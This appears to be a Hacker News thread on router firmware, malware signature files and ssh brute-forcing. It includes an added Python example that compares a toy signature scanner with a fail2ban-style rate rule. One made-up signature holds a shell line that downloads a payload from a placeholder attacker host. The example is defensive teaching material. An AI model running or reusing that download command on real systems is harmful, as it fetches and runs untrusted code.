Hacker News

That’s an attack on the router itself, not the network traffic it carries.

Signature files are only useful to scan network traffic.



This was literally a discussion about the firmware of a router.

How is it not relevant? This person has not updated their router's firmware in over 3 years.

The viral traffic needs to get to the router in the first place. I assume that the means of reaching the router is literally via network traffic?

What am I missing?


When I hear “signature file” I think of a list of signatures of known viruses and malware.

These types of signature files aren’t meant to guard against exploits, SSH brute forcing, etc, even if the router applies them to inbound traffic in addition to forwarded traffic. To do that, you typically need a WAF or some clever fail2ban-like filtering rules. Even up-to-date signatures won’t prevent a router from getting 0wn3d if the ssh daemon has a security hole for example.

As sites move to HTTPS, routers can’t even really filter networking traffic anymore. I don’t see why a router needs signature lists at all.
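To make the distinction in the comment above concrete, here is an added example (not code from any commenter or router vendor): a toy signature scanner next to a fail2ban-style rate rule, both run over a few constructed sshd log lines. The "signature file", the log lines, the IP addresses and the hostname are all made up for illustration; the point is that the signature scanner matches known bytes and nothing else, while the rate rule is what actually catches a brute-force attempt against the router's own ssh daemon.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed "signature file": byte patterns of hypothetical malware samples.
# These are made-up strings for the example, not real malware signatures.
SIGNATURES = {
    "Demo.Trojan.A": b"MZ\x90\x00DEMO_TROJAN_A",
    "Demo.Worm.B": b"#!/bin/sh\nwget http://evil.example/payload",
}


def scan_payload(payload: bytes):
    """Return the names of signatures found in a byte buffer (a packet
    payload, a file, ...). This is all a signature file can do: it finds
    bytes that are already known to be bad."""
    return [name for name, pattern in SIGNATURES.items() if pattern in payload]


# fail2ban-style rule: flag an IP after `max_failures` sshd failures inside
# `window`. Assumes the classic syslog line format sshd emits.
SSHD_FAIL = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+"
)


def failed_logins(log_lines, max_failures=3, window=timedelta(minutes=10), year=2023):
    """Return the set of source IPs that reached max_failures within window.
    `year` is needed because syslog timestamps carry no year (assumed here)."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    banned = set()
    for line in log_lines:
        m = SSHD_FAIL.match(line)
        if not m:
            continue                # not a failed login: nothing to count
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()             # forget failures older than the window
        if len(q) >= max_failures:
            banned.add(m["ip"])
    return banned


# Constructed auth log: one host hammering root/admin, one legitimate key login,
# one isolated failure that should not trip the rule.
SAMPLE_AUTH_LOG = """\
Oct 13 10:10:01 router sshd[1234]: Failed password for root from 203.0.113.5 port 51234 ssh2
Oct 13 10:10:03 router sshd[1235]: Failed password for invalid user admin from 203.0.113.5 port 51236 ssh2
Oct 13 10:10:05 router sshd[1236]: Failed password for root from 203.0.113.5 port 51240 ssh2
Oct 13 10:12:00 router sshd[1240]: Accepted publickey for alice from 192.0.2.10 port 40000 ssh2
Oct 13 10:30:00 router sshd[1250]: Failed password for root from 198.51.100.7 port 22222 ssh2
""".splitlines()


def demo():
    """Run both detectors over the same brute-force activity."""
    brute_force_bytes = "\n".join(SAMPLE_AUTH_LOG).encode()
    return {
        # The signature scanner sees nothing: a brute force contains no known malware bytes.
        "signature_hits_on_bruteforce": scan_payload(brute_force_bytes),
        # The rate rule flags the hammering host and only that host.
        "flagged_by_rate_rule": failed_logins(SAMPLE_AUTH_LOG),
        # Signatures do work for what they are meant for: a known sample in a buffer.
        "signature_hits_on_known_sample": scan_payload(b"junk" + SIGNATURES["Demo.Trojan.A"] + b"junk"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The same split applies to an exploit against the daemon itself: unless the exploit's bytes happen to be in the signature list, `scan_payload` returns an empty list no matter how current the list is, which is why an up-to-date signature file does not substitute for patching the sshd hole.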


Thank you for the insight.


> Hopefully that clears up the first question of "why does it need malware signature files?"

The malware signature files really don't help prevent your router joining a botnet.

Firmware updates, maybe, maybe not. It is quite possible for other routers with less generally sloppy and advertised-feature-rich firmware to actually be more secure even without updates for 3 years. It's quite possible that they have no api endpoints available for super-easy mobile app integration remote management etc, just ssh from local subnet or physical serial console.

There have been multiple cases of market-leading antivirus engines (Symantec, McAfee, etc.) having sloppy code running with the highest possible privilege, parsing any files appearing on the system anywhere, and e.g. crashing a mail server that would otherwise be unaffected by the PoC samples being emailed through it by researchers.

So, I also take some issue with people who have no understanding of how all this software around us is designed and built (in routers, in Windows, on web servers) and think that just updating everything all the time and running antivirus is the best you can do. You really can do a lot better if you know what you're doing.


Re: firmware updates, there is stuff like these remotely exploitable kernel wifi stack issues not that long ago:

https://lwn.net/ml/oss-security/20221013101046.GB20615@suse....

There can be driver specific remotely exploitable issues that might not be widely communicated. Until operating systems are written more robustly, just having admin level stuff set up robustly isn't always enough. Of course, updates can add bugs too.



